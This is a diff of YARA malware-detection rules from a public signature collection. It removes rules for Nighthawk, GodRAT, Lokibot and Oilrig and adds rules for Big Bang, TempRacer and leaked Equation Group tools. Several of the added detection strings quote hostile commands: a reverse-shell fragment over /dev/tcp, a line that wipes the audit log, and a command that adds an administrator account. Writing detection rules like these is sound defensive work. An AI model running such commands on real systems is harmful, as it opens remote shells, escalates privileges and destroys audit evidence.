+		modified = "2023-12-05"
+		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bigbang.yar#L3-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46404445e1fee89b598b0d42888f793dd602533cff2f72524800597af5b61197"
+		logic_hash = "496994ee035aa09233c648cf4ec0d1e84ceb970917b4dc5208a1390ec6eb39c2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
-		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
-		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
-		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
-		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4db68522600f2d8aabd255e2da999a9d9c9f1f18491cfce9dadf2296269a172b"
+		hash2 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
+		hash3 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
 
 	strings:
-		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
-		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
-		$pattern3 = { FF 7F 48 3B F0 48 0F 47 F0 48 8D }
-		$pattern4 = { 65 48 8B 04 25 30 00 00 00 8B 40 68 49 89 CA 0F 05 C3 }
-		$pattern5 = { 48 B8 AA AA AA AA AA AA AA 02 48 ?? ?? ?? ?? 0F 84 }
-		$pattern6 = { 65 48 8B 04 25 30 00 00 00 48 8B 80 }
+		$x2 = "%@W@%S@c@ri%@p@%t.S@%he@%l%@l" ascii
+		$x3 = "S%@h%@e%l%@l." ascii
+		$x4 = "(\"S@%t@%a%@rt%@up\")" ascii
+		$x5 = "aW5zdGFsbCBwcm9nOiBwcm9nIHdpbGwgZGVsZXRlIG9sZCB0bXAgZmlsZQ==" fullword ascii
+		$x6 = "aW5zdGFsbCBwcm9nOiBUaGVyZSBpcyBubyBvbGQgZmlsZSBpbiB0ZW1wLg==" fullword ascii
+		$x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii
+		$x8 = "aW5zdGFsbCBwcm9nOiBDcmVhdGUgVGFzayBhZnRlciA1IG1pbiB0byBydW4gRmlsZSBmcm9tIHRtcA==" fullword ascii
+		$x9 = "UnVuIEZpbGU6IE15IHByb2cgaXMgRXhpdC4=" fullword ascii
+		$x10 = "li%@%@nk.W%@%@indo@%%@%@%wS%@%@tyle = 3" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( 3 of ( $pattern* ) or ( pe.section_index ( ".profile" ) >= 0 and pe.section_index ( ".detourc" ) >= 0 and pe.section_index ( ".detourd" ) >= 0 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of them or pe.imphash ( ) == "0f09ea2a68d04f331df9a5d0f8641332" )
 }
-rule SIGNATURE_BASE_HKTL_MAL_Nighthawk_Nov_2022_1 : NIGHTHAWK BEACON FILE
+rule SIGNATURE_BASE_APT_ME_Bigbang_Mal_Jul18_1 : FILE
 {
 	meta:
-		description = "Detect the Nighthawk dropped beacon"
-		author = "Arkbird_SOLG"
-		id = "a46d5034-e8e3-5c30-90d9-ea97b8384341"
-		date = "2022-11-22"
-		modified = "2025-07-01"
-		reference = "https://web.archive.org/web/20221125224850/https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nighthawk_c2.yar#L32-L50"
+		description = "Detects malware from Big Bang report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f30b2e11-f90a-5068-8eaa-25f11218ec6c"
+		date = "2018-07-09"
+		modified = "2023-12-05"
+		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bigbang.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8dec7752ee6e1af87129ce7ac09130f94a20807c4f45ceb1fce434358ac727bf"
+		logic_hash = "da45482b465549fce0f088c5818dff4a734faa2e4fbcec43b750893d1c3fefad"
 		score = 75
 		quality = 85
-		tags = "NIGHTHAWK, BEACON, FILE"
-		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
-		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
-		hash3 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
+		hash2 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
 
 	strings:
-		$s1 = { 44 8b ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d c0 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 20 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 00 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d e0 e8 [2] ff ff 33 d2 e9 ee 04 00 00 48 8d 44 24 68 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 8d 95 a0 00 00 00 ff 15 [2] 09 00 85 c0 0f 85 74 04 00 00 48 89 7c 24 28 48 89 7c 24 20 45 33 c9 45 33 c0 48 8d 15 [2] 0a 00 48 8b 4c 24 68 ff 15 [2] 09 00 85 }
-		$s2 = { 4d 85 c0 0f 84 83 00 00 00 49 21 18 33 d2 44 8d 43 01 33 c9 ff 15 [2] 08 00 48 8b f0 48 85 c0 74 6a 44 8d 43 04 48 8b d5 48 8b c8 ff 15 [2] 08 00 48 8b e8 48 85 c0 74 49 48 8d 44 24 70 33 d2 44 8d 4b 24 48 89 44 24 20 4c 8d 44 24 30 48 8b cd ff 15 [2] 08 00 8b }
-		$s3 = { 48 85 c0 0f 84 [2] 00 00 4d 8b cc 49 83 7c 24 18 08 72 04 4d 8b 0c 24 4d 8b c5 49 83 7d 18 08 72 04 4d 8b 45 00 49 8b ?? 49 83 ?? 18 08 72 03 49 8b }
-		$s4 = { 44 8b 44 24 44 4c 89 [2-3] 89 95 00 02 00 00 2b c7 8b d7 49 03 d0 48 03 d1 4c 8d 8d 00 02 00 00 44 8b c0 49 8b cf ff 15 [2] 04 00 33 d2 85 c0 0f 84 [2] ff ff 03 bd 00 02 00 00 8b 44 24 40 3b f8 48 8b 4d ?? 4c 8b }
+		$s1 = "%Y%m%d-%I-%M-%S" fullword ascii
+		$s2 = "/api/serv/requests/%s/runfile/delete" fullword ascii
+		$s3 = "\\part.txt" ascii
+		$s4 = "\\ALL.txt" ascii
+		$s5 = "\\sat.txt" ascii
+		$s6 = "runfile.proccess_name" fullword ascii
+		$s7 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 60KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them
 }
-rule SIGNATURE_BASE_Sysinternals_Tool_Anomaly : FILE
+rule SIGNATURE_BASE_Tempracer : FILE
 {
 	meta:
-		description = "SysInternals Tool Anomaly - does not contain Mark Russinovich as author"
+		description = "Detects privilege escalation tool - file TempRacer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b676726b-7ecd-52ed-bdec-3d81b7596246"
-		date = "2016-12-06"
+		id = "edba6471-9720-5aad-8c15-386197700c83"
+		date = "2016-03-30"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sysinternals_anomaly.yar#L10-L31"
+		reference = "http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_tempracer.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "760795a51965197bd101ffbf0f7c8cfbbb16d2f443d0941de4a75c8f33f4cad0"
-		score = 50
+		hash = "e17d80c4822d16371d75e1440b6ac44af490b71fbee1010a3e8a5eca94d22bb3"
+		logic_hash = "37355456e13ea9fa6429b68970e0450f4ddbd8da81c070a0383b1e048a05e35a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Software\\Sysinternals\\%s" fullword ascii
-		$n1 = "Mark Russinovich" wide ascii
-		$nfp1 = "<<<Obsolete>>>" fullword wide
-		$nfp2 = "BGInfo - Wallpaper text configurator" wide
-		$nfp3 = "usage: movefile [source] [dest]" wide
-		$nfp4 = "LoadOrder information has been copied" wide
-		$nfp5 = "Cache working set cleared" wide
+		$s1 = "\\obj\\Release\\TempRacer.pdb" ascii
+		$s2 = "[+] Injecting into " fullword wide
+		$s3 = "net localgroup administrators alex /add" fullword wide
+		$s4 = "[+] File: {0} renamed to {1}" fullword wide
+		$s5 = "[+] Blocking " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $s1 and not $n1 and not 1 of ( $nfp* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 25KB and 1 of them ) or ( 4 of them )
 }
-
-rule SIGNATURE_BASE_MAL_CRIME_RAT_WIN_PE_Godrat_Aug25 : GODRAT RAT WINDOWS GH0ST_RAT GETGOD FILE
+rule SIGNATURE_BASE_Equationgroup_Emptycriss : FILE
 {
 	meta:
-		description = "Detects GodRAT malware targeting Windows systems"
-		author = "Arda Buyukkaya"
-		id = "94cb826c-81f9-5254-ad23-71efc21f403d"
-		date = "2025-08-23"
-		modified = "2025-09-09"
-		reference = "https://securelist.com/godrat/117119/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_crime_win_pe_godrat_aug25.yar#L4-L79"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
+		author = "Florian Roth (Nextron Systems)"
+		id = "658a0a2c-ea3a-5531-abea-54f0ed786e79"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L15-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "154e800ed1719dbdcb188c00d5822444717c2a89017f2d12b8511eeeda0c2f41"
-		logic_hash = "eda3175277bbf9f6408f5d2dd25d6780552aad4104fe62bb92125c734f9fdd98"
+		logic_hash = "fcfbe4a8a959491dfba9e5d958e43221d83a1e49dcf005872a1b71efb1226d99"
 		score = 75
-		quality = 83
-		tags = "GODRAT, RAT, WINDOWS, GH0ST RAT, GETGOD, FILE"
-		family = "GodRAT"
-		victims = "Financial services"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
 
 	strings:
-		$winrt_txt = "C++/WinRT version" ascii wide nocase
-		$api_blob = {
-         4E 74 43 72 65 61 74 65 53 65 63 74 69 6F 6E 00                          // NtCreateSection
-         4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 00              // NtMapViewOfSection
-         4E 74 55 6E 6D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 00 00 00  // NtUnmapViewOfSection
-      }
-		$ld_movups = { 0F 10 05 ?? ?? ?? ?? }
-		$ld_movq = { F3 0F 7E 05 ?? ?? ?? ?? }
-		$st_movups = { 0F 11 85 ?? ?? ?? ?? }
-		$st_movq = { 66 0F D6 85 ?? ?? ?? ?? }
-		$scan_loop = { 8A 01 41 84 C0 75 F9 }
-		$cmp_len_770 = { 81 FF 70 07 00 00 0F 82 ?? ?? ?? ?? }
-		$cmp_len_76C = { 81 FF 6C 07 00 00 0F 82 ?? ?? ?? ?? }
+		$s1 = "./emptycriss <target IP>" fullword ascii
+		$s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
+		$s8 = "environ define TTYPROMPT abcdef" fullword ascii
 
 	condition:
-		pe.is_pe and filesize <= 10MB and ( ( $winrt_txt and ( pe.imphash ( ) == "0f4b0270c84616ce594b6a84c47a7717" ) ) or ( ( $ld_movups or $ld_movq ) and ( ( #st_movups >= 2 ) or ( #st_movq >= 2 ) or ( #st_movups >= 1 and #st_movq >= 1 ) ) and $scan_loop and $api_blob and ( $cmp_len_770 or $cmp_len_76C ) ) or pe.imphash ( ) == "ee5ea868d8233000216e7b29bc8cb4e2" )
+		( filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_Lokibot_Dropper_Scancopypdf_Feb18 : FILE
+rule SIGNATURE_BASE_Equationgroup_Scripme : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Scan Copy.pdf.com"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
 		author = "Florian Roth (Nextron Systems)"
-		id = "64c45d91-4e18-5fd1-8d93-b5db4df7da29"
-		date = "2018-02-14"
+		id = "a2c5cd8b-c104-57d9-9ce2-a0b9a8dd9288"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_loki_bot.yar#L11-L31"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L32-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b9f10a09d91c10731e34dc88f87104693cdc794ddc3c63ee382f976d0a75f30f"
+		logic_hash = "5cffded6563bb3c94868f25e086be8d92837a7656707bf4e6a9e9f375d9ee7e0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be"
+		hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
 
 	strings:
-		$x1 = "Win32           Scan Copy.pdf   " fullword wide
-		$a1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
-		$s1 = "Compiling2.exe" fullword wide
-		$s2 = "Unstalled2" fullword ascii
-		$s3 = "Compiling.exe" fullword wide
+		$x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
+		$x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
+		$x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
+		$x4 = "$opetc/scripme.override" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 or ( $a1 and 1 of ( $s* ) )
+		( filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_Lokibot_Dropper_Packed_R11_Feb18 : FILE
+rule SIGNATURE_BASE_Equationgroup_Crypttool : FILE
 {
 	meta:
-		description = "Auto-generated rule - file scan copy.pdf.r11"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "83cd6225-eb6d-5d17-a751-51f20db9c7eb"
-		date = "2018-02-14"
+		id = "e1f4e010-9c42-5b8a-8feb-2885b99307fe"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_loki_bot.yar#L33-L46"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L50-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ca39cac8dcbbbe1697ef96bde60c522bb9cc190c208483220aa96bc672f325a"
+		logic_hash = "ae2d5eda038326376511450e1f5bd2bbf6264d23df013b005b322d70eb6266a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029"
+		hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
 
 	strings:
-		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+		$s1 = "The encryption key is " fullword ascii
+		$s2 = "___tempFile2.out" ascii
 
 	condition:
-		uint16( 0 ) == 0x0000 and filesize < 2000KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Chafer_Mimikatz_Custom : FILE
+rule SIGNATURE_BASE_Equationgroup_Dumppoppy : FILE
 {
 	meta:
-		description = "Detects Custom Mimikatz Version"
-		author = "Florian Roth (Nextron Systems) / Markus Neis"
-		id = "80f751c3-d7ca-5ff6-a905-38650e1c4ec5"
-		date = "2018-03-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c316aac3-bdd7-5187-8ae2-0a87c2f2d26f"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L11-L23"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L66-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d3b74be6d221592fb867bd9589f5e4b246a093bd276efa3515d9e948a38eda48"
+		logic_hash = "b6fb6a3799196375796da6f3a0169246145e668019dd692da67ca6f06d09c3dc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9709afeb76532566ee3029ecffc76df970a60813bcac863080cc952ad512b023"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
 
 	strings:
-		$x1 = "C:\\Users\\win7p\\Documents\\mi-back\\" ascii
+		$x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
+		$x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
+		$l1 = "End of $destfile determined by \"^Connection closed by foreign host"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Chafer_Exploit_Copyright_2017 : FILE
+rule SIGNATURE_BASE_Equationgroup_Auditcleaner : FILE
 {
 	meta:
-		description = "Detects Oilrig Internet Server Extension with Copyright (C) 2017 Exploit"
-		author = "Markus Neis"
-		id = "f78ae4f5-0569-5fc8-ab25-ebe38afd9f3c"
-		date = "2018-03-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39ed798a-221d-5a4b-8809-db01d5241418"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L25-L43"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L84-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "53d3e735bc368de152f4f4058617bc2cc5574bc13777f743442ff2bfafe92791"
+		logic_hash = "30a6ae9ce7d02c1d945d57eabf29f430ad4cdbc48dba5fe71654efc2c59fde08"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "cdac69caad8891c5e1b8eabe598c869674dee30af448ce4e801a90eb79973c66"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
 
 	strings:
-		$x1 = "test3 Internet Server Extension" fullword wide
-		$x2 = "Copyright (C) 2017 Exploit" fullword wide
-		$a1 = "popen() failed!" fullword ascii
-		$a2 = "cmd2cmd=" fullword ascii
+		$x1 = "> /var/log/audit/audit.log; rm -f ." ascii
+		$x2 = "Pastables to run on target:" ascii
+		$x3 = "cp /var/log/audit/audit.log .tmp" ascii
+		$l1 = "Here is the first good cron session from" fullword ascii
+		$l2 = "No need to clean LOGIN lines." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or all of ( $a* ) )
+		( filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Chafer_Portscanner : FILE
+rule SIGNATURE_BASE_Equationgroup_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detects Custom Portscanner used by Oilrig"
-		author = "Markus Neis"
-		id = "8db934c3-fb0d-5c87-9096-1ee8fb16f9a5"
-		date = "2018-03-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0e9b8ff2-2187-5b61-a086-2ad4ff1a3b10"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L45-L59"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L104-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e0475a5c0fc8155359376113f88f3de080968388bd3ea60664a063540688faf"
+		logic_hash = "6dc388fecbf606b19c04626d64f5fe4184f07c2a1597a6f8337aa4a827b2d89b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "88274a68a6e07bdc53171641e7349d6d0c71670bd347f11dcc83306fe06656e9"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
 
 	strings:
-		$x1 = "C:\\Users\\RS01204N\\Documents\\" ascii
-		$x2 = "PortScanner /ip:google.com  /port:80 /t:500 /tout:2" fullword ascii
-		$x3 = "open ports of host/hosts" fullword ascii
+		$s1 = "sh >/dev/tcp/" ascii
+		$s2 = " <&1 2>&1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Oilrig_Myrtille : FILE
+rule SIGNATURE_BASE_Equationgroup_Tnmunger : FILE
 {
 	meta:
-		description = "Detects Oilrig Myrtille RDP Browser"
-		author = "Markus Neis"
-		id = "e742ab0c-0e21-569e-a100-e5082dc1d372"
-		date = "2018-03-22"
-		modified = "2022-12-21"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L61-L76"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c95dd24f-ffc9-5e58-aed7-205daa001b8c"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L120-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "373115c0a3fbfe93435aca07cbac52c7649a77d8b7d6eda8af5ce4a1a42e53a6"
+		logic_hash = "ddb957ca9350288d0fa98ba20847a99dcba931b5a03d0ae94cd3409f82f728eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "67945f2e65a4a53e2339bd361652c6663fe25060888f18e681418e313d1292ca"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
 
 	strings:
-		$x1 = "\\obj\\Release\\Myrtille.Services.pdb" ascii
-		$x2 = "Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})" fullword wide
-		$x3 = "Started rdp client process, remote session {0}" fullword wide
+		$s1 = "TEST: mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
+		$s2 = "mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_Chafer_Packed_Mimikatz : FILE
+rule SIGNATURE_BASE_Equationgroup_Ys_Ratload : FILE
 {
 	meta:
-		description = "Detects Oilrig Packed Mimikatz also detected as Chafer_WSC_x64 by FR"
-		author = "Florian Roth (Nextron Systems) / Markus Neis"
-		id = "abd34c6a-7d99-5f52-be8e-a7d634d61255"
-		date = "2018-03-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
+		author = "Florian Roth (Nextron Systems)"
+		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig_chafer_mar18.yar#L78-L92"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L136-L151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0cee5270c9b76f1419c6989113dca221c5ba6f027a104d71f61d38cb59af51cd"
+		logic_hash = "82d00b7eecdb60911ecd933387eeb2ce4eec9721993beee60247d1273ad3368f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5f2c3b5a08bda50cca6385ba7d84875973843885efebaff6a482a38b3cb23a7c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
 
 	strings:
-		$s1 = "Windows Security Credentials" fullword wide
-		$s2 = "Minisoft" fullword wide
-		$x1 = "Copyright (c) 2014 - 2015 Minisoft" fullword wide
